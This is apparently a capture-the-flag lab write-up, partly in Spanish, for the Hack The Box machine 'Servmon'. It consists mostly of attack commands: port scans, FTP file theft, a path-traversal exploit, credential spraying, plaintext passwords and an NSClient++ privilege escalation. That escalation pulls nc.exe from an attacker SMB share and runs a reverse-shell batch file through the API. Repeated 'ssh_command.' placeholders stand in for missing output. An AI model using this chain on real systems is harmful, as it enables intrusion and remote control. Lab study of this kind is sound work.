Servmon

Servmon


HTB Windows

nmap -A -p- -oA servmon 10.129.96.105 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA servmon 10.129.96.105

nmap -sU -O -p- -oA servmon-udp 10.129.96.105

nikto -h 10.129.96.105:80

ssh_command.

ssh_command.

ftp 10.129.96.105

cd Users\Nadine

get Confidential.txt

ssh_command.

cat Confidential.txt

ssh_command.

cat Notes to do.txt

ssh_command.

crackmapexec smb 10.129.96.105

ssh_command.

smbclient -L 10.129.96.105 -N

ssh_command.

http://10.129.96.105

ssh_command.

searchsploit NVMS

ssh_command.

cat 47774.txt

ssh_command.

Abrimos burp suite y hacemos a la siguiente url:

ssh_command.

Nos encontramos unas contrasenas Y los metemos en un archivo credentials.txt

ssh_command.

crackmapexec smb 10.129.96.105 -u users -p credentials.txt

ssh_command.

ssh nadine@servmon.htb

nadine:L1k3B1gBut7s@W0rk

ssh_command.

whoami /priv

ssh_command.

whoami /all

ssh_command.

net user Nadine

ssh_command.

http://10.129.179.121:8443

ssh_command.

searchsploit nsclient

ssh_command.

searchsploit -m 46802

cat 46802.txt

ssh_command.

Leemos las intrucciones del exploit

ssh_command.

cd C:\Program Files\NSClient

nscp web —password —display

ssh_command.

No nos funciona la contrasena

ssh_command.

Hacemos un port forwarding

ssh_command.

Usamos la contrasena ew2x6SsGTxjRwXOT

ssh_command.

Aseguramos que este habilitado

ssh_command.

Creamos un bat file y le ponemos el codigo para un reverse shell

ssh_command.

copy \10.10.14.135\smbFolder\nc.exe nc.exe

sudo python3 /opt/impacket/smbserver.py smbFolder $(pwd) -smb2support

ssh_command.

net use x: \10.10.14.135\smbFolder /user:cu3rv0x password123

copy x:\reverse.bat reverse.bat

ssh_command.

copy x:\nc.exe nc.exe

ssh_command.

Le damos click a Add pero no me funciona.

ssh_command.

curl -k -u “admin:ew2x6SsGTxjRwXOT” -XPUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/reverse.bat —data-binary @reverse.bat ssh_command.

curl -k -u “admin:ew2x6SsGTxjRwXOT” https://127.0.0.1:8443/api/v1/queries/reverse/commands/execute nc -lvnp 443

ssh_command.

© 2025 Cu3rv0x